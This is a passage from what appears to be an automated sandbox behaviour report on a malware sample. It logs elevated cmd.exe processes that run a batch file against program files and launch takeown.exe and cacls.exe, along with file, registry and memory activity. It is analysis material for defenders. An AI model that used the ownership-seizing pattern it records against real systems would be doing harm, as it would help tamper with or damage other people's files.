39 | |
| Get Info | - | type = file_type |
|
3 | |
| Get Info | - | type = file_type |
|
3 | |
| Get Info | vIDhS3md.exe | type = file_attributes |
|
1 | |
| Open | STD_OUTPUT_HANDLE | - |
|
132 | |
| Open | STD_INPUT_HANDLE | - |
|
8 | |
| Open | - | - |
|
4 | |
| Open | - | - |
|
11 | |
| Open | - | - |
|
12 | |
| Read | - | size = 8191, size_out = 226 |
|
1 | |
| Read | - | size = 8191, size_out = 194 |
|
1 | |
| Read | - | size = 8191, size_out = 179 |
|
1 | |
| Read | - | size = 8191, size_out = 163 |
|
1 | |
| Read | - | size = 8191, size_out = 148 |
|
1 | |
| Read | - | size = 8191, size_out = 0 |
|
2 | |
| Write | STD_OUTPUT_HANDLE | size = 2 |
|
15 | |
| Write | STD_OUTPUT_HANDLE | size = 30 |
|
6 | |
| Write | STD_OUTPUT_HANDLE | size = 5 |
|
1 | |
| Write | STD_OUTPUT_HANDLE | size = 112 |
|
1 | |
| Write | STD_OUTPUT_HANDLE | size = 7 |
|
2 | |
| Write | STD_OUTPUT_HANDLE | size = 91 |
|
1 | |
| Write | STD_OUTPUT_HANDLE | size = 3 |
|
3 | |
| Write | STD_OUTPUT_HANDLE | size = 23 |
|
1 | |
| Write | STD_OUTPUT_HANDLE | size = 37 |
|
1 | |
| Write | STD_OUTPUT_HANDLE | size = 32 |
|
1 | |
| Write | STD_OUTPUT_HANDLE | size = 61 |
|
1 | |
| Write | STD_OUTPUT_HANDLE | size = 1 |
|
2 | |
| Write | STD_OUTPUT_HANDLE | size = 12 |
|
2 | |
| Write | STD_OUTPUT_HANDLE | size = 38 |
|
1 | |
| Write | STD_OUTPUT_HANDLE | size = 44 |
|
1 |
Registry (17)
| Operation | Key | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Open Key | HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\System | - |
|
1 | |
| Open Key | HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor | - |
|
1 | |
| Open Key | HKEY_CURRENT_USER\Software\Microsoft\Command Processor | - |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor | value_name = DisableUNCCheck, data = 168, type = REG_NONE |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor | value_name = EnableExtensions, data = 1, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor | value_name = DelayedExpansion, data = 1, type = REG_NONE |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor | value_name = DefaultColor, data = 0, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor | value_name = CompletionChar, data = 64, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor | value_name = PathCompletionChar, data = 64, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor | value_name = AutoRun, data = 64, type = REG_NONE |
|
1 | |
| Read Value | HKEY_CURRENT_USER\Software\Microsoft\Command Processor | value_name = DisableUNCCheck, data = 64, type = REG_NONE |
|
1 | |
| Read Value | HKEY_CURRENT_USER\Software\Microsoft\Command Processor | value_name = EnableExtensions, data = 1, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Read Value | HKEY_CURRENT_USER\Software\Microsoft\Command Processor | value_name = DelayedExpansion, data = 1, type = REG_NONE |
|
1 | |
| Read Value | HKEY_CURRENT_USER\Software\Microsoft\Command Processor | value_name = DefaultColor, data = 0, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Read Value | HKEY_CURRENT_USER\Software\Microsoft\Command Processor | value_name = CompletionChar, data = 9, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Read Value | HKEY_CURRENT_USER\Software\Microsoft\Command Processor | value_name = PathCompletionChar, data = 9, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Read Value | HKEY_CURRENT_USER\Software\Microsoft\Command Processor | value_name = AutoRun, data = 9, type = REG_NONE |
|
1 |
Process (4)
| Operation | Process | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Create | C:\Windows\system32\cacls.exe | os_pid = 0x550, creation_flags = CREATE_EXTENDED_STARTUPINFO_PRESENT, show_window = SW_SHOWNORMAL |
|
1 | |
| Create | C:\Windows\system32\takeown.exe | os_pid = 0x118, creation_flags = CREATE_EXTENDED_STARTUPINFO_PRESENT, show_window = SW_SHOWNORMAL |
|
1 | |
| Create | cmd.exe | - |
|
1 | |
| Create | C:\Users\CIiHmnxMn6Ps\Desktop\vIDhS3md.exe | os_pid = 0xd14, creation_flags = CREATE_EXTENDED_STARTUPINFO_PRESENT, show_window = SW_SHOWNORMAL |
|
1 |
Module (8)
| Operation | Module | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Get Handle | c:\windows\syswow64\cmd.exe | base_address = 0x13d0000 |
|
1 | |
| Get Handle | c:\windows\syswow64\kernel32.dll | base_address = 0x75130000 |
|
2 | |
| Get Filename | - | process_name = c:\windows\syswow64\cmd.exe, file_name_orig = C:\Windows\SysWOW64\cmd.exe, size = 260 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = SetThreadUILanguage, address_out = 0x75172780 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = CopyFileExW, address_out = 0x7514fa80 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = IsDebuggerPresent, address_out = 0x7514a790 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = SetConsoleInputExeNameW, address_out = 0x74e435c0 |
|
1 |
Environment (51)
| Operation | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|
| Get Environment String | - |
|
15 | |
| Get Environment String | name = PATH, result_out = C:\ProgramData\Oracle\Java\javapath;C:\Windows\system32;C:\Windows;C:\Windows\System32\Wbem;C:\Windows\System32\WindowsPowerShell\v1.0\ |
|
6 | |
| Get Environment String | name = PATHEXT, result_out = .COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC |
|
7 | |
| Get Environment String | name = PROMPT |
|
1 | |
| Get Environment String | name = COMSPEC, result_out = C:\Windows\system32\cmd.exe |
|
1 | |
| Get Environment String | name = KEYS |
|
1 | |
| Get Environment String | name = USERNAME, result_out = CIiHmnxMn6Ps |
|
1 | |
| Get Environment String | name = PROMPT, result_out = $P$G |
|
5 | |
| Get Environment String | name = FN, result_out = "Workflow.Targets" |
|
1 | |
| Set Environment String | name = PROMPT, value = $P$G |
|
1 | |
| Set Environment String | name = =C:, value = C:\Users\CIiHmnxMn6Ps\Desktop |
|
2 | |
| Set Environment String | name = COPYCMD |
|
3 | |
| Set Environment String | name = =ExitCode, value = 00000000 |
|
3 | |
| Set Environment String | name = =ExitCodeAscii |
|
3 | |
| Set Environment String | name = FN, value = "Workflow.Targets" |
|
1 |
Process #82: cmd.exe
353
0
| Information | Value |
|---|---|
| ID | #82 |
| File Name | c:\windows\syswow64\cmd.exe |
| Command Line | C:\Windows\system32\cmd.exe /c ""C:\Users\CIiHmnxMn6Ps\Desktop\vRnqNMBW.bat" "C:\Program Files\Windows Journal\Journal.exe"" |
| Initial Working Directory | C:\Users\CIiHmnxMn6Ps\Desktop\ |
| Monitor | Start Time: 00:04:00, Reason: Child Process |
| Unmonitor | End Time: 00:05:01, Reason: Terminated by Timeout |
| Monitor Duration | 00:01:01 |
OS Process Information
| Information | Value |
|---|---|
| PID | 0xeac |
| Parent PID | 0xbd0 (c:\users\ciihmnxmn6ps\desktop\current_dirnwovkcyl.exe) |
| Is Created or Modified Executable |
|
| Integrity Level | High (Elevated) |
| Username | LHNIWSJ\CIiHmnxMn6Ps |
| Enabled Privileges | SeChangeNotifyPrivilege, SeImpersonatePrivilege, SeCreateGlobalPrivilege |
| Thread IDs |
0x
EB0
0x
F2C
|
Region
| Name | Start VA | End VA | Type | Permissions | Monitored | Dumped | YARA | Actions |
|---|---|---|---|---|---|---|---|---|
| private_0x0000000000a30000 | 0x00a30000 | 0x00a4ffff | Private Memory | rw |
|
|
|
- |
| pagefile_0x0000000000a30000 | 0x00a30000 | 0x00a3ffff | Pagefile Backed Memory | rw |
|
|
|
- |
| private_0x0000000000a40000 | 0x00a40000 | 0x00a43fff | Private Memory | rw |
|
|
|
- |
| private_0x0000000000a50000 | 0x00a50000 | 0x00a51fff | Private Memory | rw |
|
|
|
- |
| private_0x0000000000a50000 | 0x00a50000 | 0x00a53fff | Private Memory | rw |
|
|
|
- |
| pagefile_0x0000000000a60000 | 0x00a60000 | 0x00a73fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x0000000000a80000 | 0x00a80000 | 0x00abffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000000ac0000 | 0x00ac0000 | 0x00bbffff | Private Memory | rw |
|
|
|
- |
| pagefile_0x0000000000bc0000 | 0x00bc0000 | 0x00bc3fff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x0000000000bd0000 | 0x00bd0000 | 0x00bd0fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x0000000000be0000 | 0x00be0000 | 0x00be1fff | Private Memory | rw |
|
|
|
- |
| private_0x0000000000bf0000 | 0x00bf0000 | 0x00bfffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000000c00000 | 0x00c00000 | 0x00e0ffff | Private Memory | rw |
|
|
|
- |
| locale.nls | 0x00c00000 | 0x00cbdfff | Memory Mapped File | r |
|
|
|
- |
| private_0x0000000000cc0000 | 0x00cc0000 | 0x00cfffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000000d00000 | 0x00d00000 | 0x00d0ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000000d10000 | 0x00d10000 | 0x00e0ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000000e10000 | 0x00e10000 | 0x00f0ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000000f10000 | 0x00f10000 | 0x0106ffff | Private Memory | rw |
|
|
|
- |
| sortdefault.nls | 0x01070000 | 0x013a6fff | Memory Mapped File | r |
|
|
|
- |
| cmd.exe | 0x013d0000 | 0x0141ffff | Memory Mapped File | rwx |
|
|
|
- |
| pagefile_0x0000000001420000 | 0x01420000 | 0x0541ffff | Pagefile Backed Memory | - |
|
|
|
- |
| wow64cpu.dll | 0x73030000 | 0x73037fff | Memory Mapped File | rwx |
|
|
|
- |
| wow64.dll | 0x73040000 | 0x7308efff | Memory Mapped File | rwx |
|
|
|
- |
| wow64win.dll | 0x73090000 | 0x73102fff | Memory Mapped File | rwx |
|
|
|
- |
| cmdext.dll | 0x74540000 | 0x74547fff | Memory Mapped File | rwx |
|
|
|
- |
| bcryptprimitives.dll | 0x74a30000 | 0x74a88fff | Memory Mapped File | rwx |
|
|
|
- |
| cryptbase.dll | 0x74a90000 | 0x74a99fff | Memory Mapped File | rwx |
|
|
|
- |
| sspicli.dll | 0x74aa0000 | 0x74abdfff | Memory Mapped File | rwx |
|
|
|
- |
| advapi32.dll | 0x74c60000 | 0x74cdafff | Memory Mapped File | rwx |
|
|
|
- |
| kernelbase.dll | 0x74d30000 | 0x74ea5fff | Memory Mapped File | rwx |
|
|
|
- |
| kernel32.dll | 0x75130000 | 0x7521ffff | Memory Mapped File | rwx |
|
|
|
- |
| sechost.dll | 0x770b0000 | 0x770f2fff | Memory Mapped File | rwx |
|
|
|
- |
| rpcrt4.dll | 0x772c0000 | 0x7736bfff | Memory Mapped File | rwx |
|
|
|
- |
| msvcrt.dll | 0x778d0000 | 0x7798dfff | Memory Mapped File | rwx |
|
|
|
- |
| ntdll.dll | 0x77990000 | 0x77b08fff | Memory Mapped File | rwx |
|
|
|
- |
| pagefile_0x000000007f030000 | 0x7f030000 | 0x7f12ffff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x000000007f130000 | 0x7f130000 | 0x7f152fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x000000007f158000 | 0x7f158000 | 0x7f15afff | Private Memory | rw |
|
|
|
- |
| private_0x000000007f15b000 | 0x7f15b000 | 0x7f15dfff | Private Memory | rw |
|
|
|
- |
| private_0x000000007f15e000 | 0x7f15e000 | 0x7f15efff | Private Memory | rw |
|
|
|
- |
| private_0x000000007f15f000 | 0x7f15f000 | 0x7f15ffff | Private Memory | rw |
|
|
|
- |
| private_0x000000007ffe0000 | 0x7ffe0000 | 0x7ffeffff | Private Memory | r |
|
|
|
- |
| private_0x000000007fff0000 | 0x7fff0000 | 0x7dfaf7a0ffff | Private Memory | r |
|
|
|
- |
| pagefile_0x00007dfaf7a10000 | 0x7dfaf7a10000 | 0x7ffaf7a0ffff | Pagefile Backed Memory | - |
|
|
|
- |
| ntdll.dll | 0x7ffaf7a10000 | 0x7ffaf7bd1fff | Memory Mapped File | rwx |
|
|
|
- |
| private_0x00007ffaf7bd2000 | 0x7ffaf7bd2000 | 0x7ffffffeffff | Private Memory | r |
|
|
|
- |
Host Behavior
File (271)
| Operation | Filename | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Create | C:\Users\CIiHmnxMn6Ps\Desktop\vRnqNMBW.bat | desired_access = GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ, FILE_SHARE_WRITE |
|
1 | |
| Create | C:\Users\CIiHmnxMn6Ps\Desktop\vRnqNMBW.bat | desired_access = GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ, FILE_SHARE_WRITE |
|
2 | |
| Create | C:\Users\CIiHmnxMn6Ps\Desktop\vRnqNMBW.bat | desired_access = GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ, FILE_SHARE_WRITE |
|
3 | |
| Get Info | C:\Users\CIiHmnxMn6Ps\Desktop | type = file_attributes |
|
4 | |
| Get Info | "C:\Users\CIiHmnxMn6Ps\Desktop\vRnqNMBW.bat" | type = file_attributes |
|
1 | |
| Get Info | - | type = file_type |
|
1 | |
| Get Info | STD_OUTPUT_HANDLE | type = file_type |
|
39 | |
| Get Info | - | type = file_type |
|
3 | |
| Get Info | - | type = file_type |
|
3 | |
| Get Info | vIDhS3md.exe | type = file_attributes |
|
1 | |
| Open | STD_OUTPUT_HANDLE | - |
|
132 | |
| Open | STD_INPUT_HANDLE | - |
|
8 | |
| Open | - | - |
|
4 | |
| Open | - | - |
|
11 | |
| Open | - | - |
|
12 | |
| Read | - | size = 8191, size_out = 226 |
|
1 | |
| Read | - | size = 8191, size_out = 194 |
|
1 | |
| Read | - | size = 8191, size_out = 179 |
|
1 | |
| Read | - | size = 8191, size_out = 163 |
|
1 | |
| Read | - | size = 8191, size_out = 148 |
|
1 | |
| Read | - | size = 8191, size_out = 0 |
|
2 | |
| Write | STD_OUTPUT_HANDLE | size = 2 |
|
15 | |
| Write | STD_OUTPUT_HANDLE | size = 30 |
|
6 | |
| Write | STD_OUTPUT_HANDLE | size = 5 |
|
1 | |
| Write | STD_OUTPUT_HANDLE | size = 72 |
|
1 | |
| Write | STD_OUTPUT_HANDLE | size = 7 |
|
2 | |
| Write | STD_OUTPUT_HANDLE | size = 51 |
|
1 | |
| Write | STD_OUTPUT_HANDLE | size = 3 |
|
3 | |
| Write | STD_OUTPUT_HANDLE | size = 18 |
|
1 | |
| Write | STD_OUTPUT_HANDLE | size = 37 |
|
1 | |
| Write | STD_OUTPUT_HANDLE | size = 32 |
|
1 | |
| Write | STD_OUTPUT_HANDLE | size = 56 |
|
1 | |
| Write | STD_OUTPUT_HANDLE | size = 1 |
|
2 | |
| Write | STD_OUTPUT_HANDLE | size = 12 |
|
2 | |
| Write | STD_OUTPUT_HANDLE | size = 38 |
|
1 | |
| Write | STD_OUTPUT_HANDLE | size = 44 |
|
1 |
Registry (17)
| Operation | Key | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Open Key | HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\System | - |
|
1 | |
| Open Key | HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor | - |
|
1 | |
| Open Key | HKEY_CURRENT_USER\Software\Microsoft\Command Processor | - |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor | value_name = DisableUNCCheck, data = 213, type = REG_NONE |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor | value_name = EnableExtensions, data = 1, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor | value_name = DelayedExpansion, data = 1, type = REG_NONE |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor | value_name = DefaultColor, data = 0, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor | value_name = CompletionChar, data = 64, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor | value_name = PathCompletionChar, data = 64, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor | value_name = AutoRun, data = 64, type = REG_NONE |
|
1 | |
| Read Value | HKEY_CURRENT_USER\Software\Microsoft\Command Processor | value_name = DisableUNCCheck, data = 64, type = REG_NONE |
|
1 | |
| Read Value | HKEY_CURRENT_USER\Software\Microsoft\Command Processor | value_name = EnableExtensions, data = 1, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Read Value | HKEY_CURRENT_USER\Software\Microsoft\Command Processor | value_name = DelayedExpansion, data = 1, type = REG_NONE |
|
1 | |
| Read Value | HKEY_CURRENT_USER\Software\Microsoft\Command Processor | value_name = DefaultColor, data = 0, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Read Value | HKEY_CURRENT_USER\Software\Microsoft\Command Processor | value_name = CompletionChar, data = 9, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Read Value | HKEY_CURRENT_USER\Software\Microsoft\Command Processor | value_name = PathCompletionChar, data = 9, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Read Value | HKEY_CURRENT_USER\Software\Microsoft\Command Processor | value_name = AutoRun, data = 9, type = REG_NONE |
|
1 |
Process (4)
| Operation | Process | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Create | C:\Windows\system32\cacls.exe | os_pid = 0x370, creation_flags = CREATE_EXTENDED_STARTUPINFO_PRESENT, show_window = SW_SHOWNORMAL |
|
1 | |
| Create | C:\Windows\system32\takeown.exe | os_pid = 0x71c, creation_flags = CREATE_EXTENDED_STARTUPINFO_PRESENT, show_window = SW_SHOWNORMAL |
|
1 | |
| Create | cmd.exe | - |
|
1 | |
| Create | C:\Users\CIiHmnxMn6Ps\Desktop\vIDhS3md.exe | os_pid = 0x544, creation_flags = CREATE_EXTENDED_STARTUPINFO_PRESENT, show_window = SW_SHOWNORMAL |
|
1 |
Module (8)
| Operation | Module | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Get Handle | c:\windows\syswow64\cmd.exe | base_address = 0x13d0000 |
|
1 | |
| Get Handle | c:\windows\syswow64\kernel32.dll | base_address = 0x75130000 |
|
2 | |
| Get Filename | - | process_name = c:\windows\syswow64\cmd.exe, file_name_orig = C:\Windows\SysWOW64\cmd.exe, size = 260 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = SetThreadUILanguage, address_out = 0x75172780 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = CopyFileExW, address_out = 0x7514fa80 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = IsDebuggerPresent, address_out = 0x7514a790 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = SetConsoleInputExeNameW, address_out = 0x74e435c0 |
|
1 |
Environment (51)
| Operation | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|
| Get Environment String | - |
|
15 | |
| Get Environment String | name = PATH, result_out = C:\ProgramData\Oracle\Java\javapath;C:\Windows\system32;C:\Windows;C:\Windows\System32\Wbem;C:\Windows\System32\WindowsPowerShell\v1.0\ |
|
6 | |
| Get Environment String | name = PATHEXT, result_out = .COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC |
|
7 | |
| Get Environment String | name = PROMPT |
|
1 | |
| Get Environment String | name = COMSPEC, result_out = C:\Windows\system32\cmd.exe |
|
1 | |
| Get Environment String | name = KEYS |
|
1 | |
| Get Environment String | name = USERNAME, result_out = CIiHmnxMn6Ps |
|
1 | |
| Get Environment String | name = PROMPT, result_out = $P$G |
|
5 | |
| Get Environment String | name = FN, result_out = "Journal.exe" |
|
1 | |
| Set Environment String | name = PROMPT, value = $P$G |
|
1 | |
| Set Environment String | name = =C:, value = C:\Users\CIiHmnxMn6Ps\Desktop |
|
2 | |
| Set Environment String | name = COPYCMD |
|
3 | |
| Set Environment String | name = =ExitCode, value = 00000000 |
|
2 | |
| Set Environment String | name = =ExitCodeAscii |
|
3 | |
| Set Environment String | name = FN, value = "Journal.exe" |
|
1 | |
| Set Environment String | name = =ExitCode, value = 00000001 |
|
1 |
Process #83: cmd.exe
331
0
| Information | Value |
|---|---|
| ID | #83 |
| File Name | c:\windows\syswow64\cmd.exe |
| Command Line | C:\Windows\system32\cmd.exe /c ""C:\Users\CIiHmnxMn6Ps\Desktop\vRnqNMBW.bat" "C:\Program Files\Windows Journal\Templates\Seyes.jtp"" |
| Initial Working Directory | C:\Users\CIiHmnxMn6Ps\Desktop\ |
| Monitor | Start Time: 00:04:15, Reason: Child Process |
| Unmonitor | End Time: 00:05:01, Reason: Terminated by Timeout |
| Monitor Duration | 00:00:46 |
OS Process Information
| Information | Value |
|---|---|
| PID | 0xe4c |
| Parent PID | 0xbd0 (c:\users\ciihmnxmn6ps\desktop\current_dirnwovkcyl.exe) |
| Is Created or Modified Executable |
|
| Integrity Level | High (Elevated) |
| Username | LHNIWSJ\CIiHmnxMn6Ps |
| Enabled Privileges | SeChangeNotifyPrivilege, SeImpersonatePrivilege, SeCreateGlobalPrivilege |
| Thread IDs |
0x
AB0
0x
580
|
Region
| Name | Start VA | End VA | Type | Permissions | Monitored | Dumped | YARA | Actions |
|---|---|---|---|---|---|---|---|---|
| private_0x0000000000460000 | 0x00460000 | 0x0047ffff | Private Memory | rw |
|
|
|
- |
| pagefile_0x0000000000460000 | 0x00460000 | 0x0046ffff | Pagefile Backed Memory | rw |
|
|
|
- |
| private_0x0000000000470000 | 0x00470000 | 0x00473fff | Private Memory | rw |
|
|
|
- |
| private_0x0000000000480000 | 0x00480000 | 0x00481fff | Private Memory | rw |
|
|
|
- |
| private_0x0000000000480000 | 0x00480000 | 0x00483fff | Private Memory | rw |
|
|
|
- |
| pagefile_0x0000000000490000 | 0x00490000 | 0x004a3fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x00000000004b0000 | 0x004b0000 | 0x004effff | Private Memory | rw |
|
|
|
- |
| private_0x00000000004f0000 | 0x004f0000 | 0x005effff | Private Memory | rw |
|
|
|
- |
| pagefile_0x00000000005f0000 | 0x005f0000 | 0x005f3fff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x0000000000600000 | 0x00600000 | 0x00600fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x0000000000610000 | 0x00610000 | 0x00611fff | Private Memory | rw |
|
|
|
- |
| private_0x0000000000620000 | 0x00620000 | 0x0065ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000000660000 | 0x00660000 | 0x0066ffff | Private Memory | rw |
|
|
|
- |
| private_0x00000000006d0000 | 0x006d0000 | 0x006dffff | Private Memory | rw |
|
|
|
- |
| private_0x00000000006e0000 | 0x006e0000 | 0x0085ffff | Private Memory | rw |
|
|
|
- |
| locale.nls | 0x00860000 | 0x0091dfff | Memory Mapped File | r |
|
|
|
- |
| private_0x0000000000920000 | 0x00920000 | 0x00a1ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000000a20000 | 0x00a20000 | 0x00b3ffff | Private Memory | rw |
|
|
|
- |
| sortdefault.nls | 0x00b40000 | 0x00e76fff | Memory Mapped File | r |
|
|
|
- |
| cmd.exe | 0x013d0000 | 0x0141ffff | Memory Mapped File | rwx |
|
|
|
- |
| pagefile_0x0000000001420000 | 0x01420000 | 0x0541ffff | Pagefile Backed Memory | - |
|
|
|
- |
| wow64cpu.dll | 0x73030000 | 0x73037fff | Memory Mapped File | rwx |
|
|
|
- |
| wow64.dll | 0x73040000 | 0x7308efff | Memory Mapped File | rwx |
|
|
|
- |
| wow64win.dll | 0x73090000 | 0x73102fff | Memory Mapped File | rwx |
|
|
|
- |
| cmdext.dll | 0x74540000 | 0x74547fff | Memory Mapped File | rwx |
|
|
|
- |
| bcryptprimitives.dll | 0x74a30000 | 0x74a88fff | Memory Mapped File | rwx |
|
|
|
- |
| cryptbase.dll | 0x74a90000 | 0x74a99fff | Memory Mapped File | rwx |
|
|
|
- |
| sspicli.dll | 0x74aa0000 | 0x74abdfff | Memory Mapped File | rwx |
|
|
|
- |
| advapi32.dll | 0x74c60000 | 0x74cdafff | Memory Mapped File | rwx |
|
|
|
- |
| kernelbase.dll | 0x74d30000 | 0x74ea5fff | Memory Mapped File | rwx |
|
|
|
- |
| kernel32.dll | 0x75130000 | 0x7521ffff | Memory Mapped File | rwx |
|
|
|
- |
| sechost.dll | 0x770b0000 | 0x770f2fff | Memory Mapped File | rwx |
|
|
|
- |
| rpcrt4.dll | 0x772c0000 | 0x7736bfff | Memory Mapped File | rwx |
|
|
|
- |
| msvcrt.dll | 0x778d0000 | 0x7798dfff | Memory Mapped File | rwx |
|
|
|
- |
| ntdll.dll | 0x77990000 | 0x77b08fff | Memory Mapped File | rwx |
|
|
|
- |
| pagefile_0x000000007f270000 | 0x7f270000 | 0x7f36ffff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x000000007f370000 | 0x7f370000 | 0x7f392fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x000000007f396000 | 0x7f396000 | 0x7f398fff | Private Memory | rw |
|
|
|
- |
| private_0x000000007f399000 | 0x7f399000 | 0x7f399fff | Private Memory | rw |
|
|
|
- |
| private_0x000000007f39c000 | 0x7f39c000 | 0x7f39efff | Private Memory | rw |
|
|
|
- |
| private_0x000000007f39f000 | 0x7f39f000 | 0x7f39ffff | Private Memory | rw |
|
|
|
- |
| private_0x000000007ffe0000 | 0x7ffe0000 | 0x7ffeffff | Private Memory | r |
|
|
|
- |
| private_0x000000007fff0000 | 0x7fff0000 | 0x7dfaf7a0ffff | Private Memory | r |
|
|
|
- |
| pagefile_0x00007dfaf7a10000 | 0x7dfaf7a10000 | 0x7ffaf7a0ffff | Pagefile Backed Memory | - |
|
|
|
- |
| ntdll.dll | 0x7ffaf7a10000 | 0x7ffaf7bd1fff | Memory Mapped File | rwx |
|
|
|
- |
| private_0x00007ffaf7bd2000 | 0x7ffaf7bd2000 | 0x7ffffffeffff | Private Memory | r |
|
|
|
- |
Host Behavior
File (253)
| Operation | Filename | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Create | C:\Users\CIiHmnxMn6Ps\Desktop\vRnqNMBW.bat | desired_access = GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ, FILE_SHARE_WRITE |
|
1 | |
| Create | C:\Users\CIiHmnxMn6Ps\Desktop\vRnqNMBW.bat | desired_access = GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ, FILE_SHARE_WRITE |
|
1 | |
| Create | C:\Users\CIiHmnxMn6Ps\Desktop\vRnqNMBW.bat | desired_access = GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ, FILE_SHARE_WRITE |
|
3 | |
| Get Info | C:\Users\CIiHmnxMn6Ps\Desktop | type = file_attributes |
|
4 | |
| Get Info | "C:\Users\CIiHmnxMn6Ps\Desktop\vRnqNMBW.bat" | type = file_attributes |
|
1 | |
| Get Info | - | type = file_type |
|
1 | |
| Get Info | STD_OUTPUT_HANDLE | type = file_type |
|
39 | |
| Get Info | - | type = file_type |
|
1 | |
| Get Info | - | type = file_type |
|
3 | |
| Get Info | vIDhS3md.exe | type = file_attributes |
|
1 | |
| Open | STD_OUTPUT_HANDLE | - |
|
128 | |
| Open | STD_INPUT_HANDLE | - |
|
6 | |
| Open | - | - |
|
4 | |
| Open | - | - |
|
4 | |
| Open | - | - |
|
12 | |
| Read | - | size = 8191, size_out = 226 |
|
1 | |
| Read | - | size = 8191, size_out = 194 |
|
1 | |
| Read | - | size = 8191, size_out = 179 |
|
1 | |
| Read | - | size = 8191, size_out = 163 |
|
1 | |
| Read | - | size = 8191, size_out = 148 |
|
1 | |
| Write | STD_OUTPUT_HANDLE | size = 2 |
|
15 | |
| Write | STD_OUTPUT_HANDLE | size = 30 |
|
6 | |
| Write | STD_OUTPUT_HANDLE | size = 5 |
|
1 | |
| Write | STD_OUTPUT_HANDLE | size = 80 |
|
1 | |
| Write | STD_OUTPUT_HANDLE | size = 7 |
|
2 | |
| Write | STD_OUTPUT_HANDLE | size = 59 |
|
1 | |
| Write | STD_OUTPUT_HANDLE | size = 3 |
|
3 | |
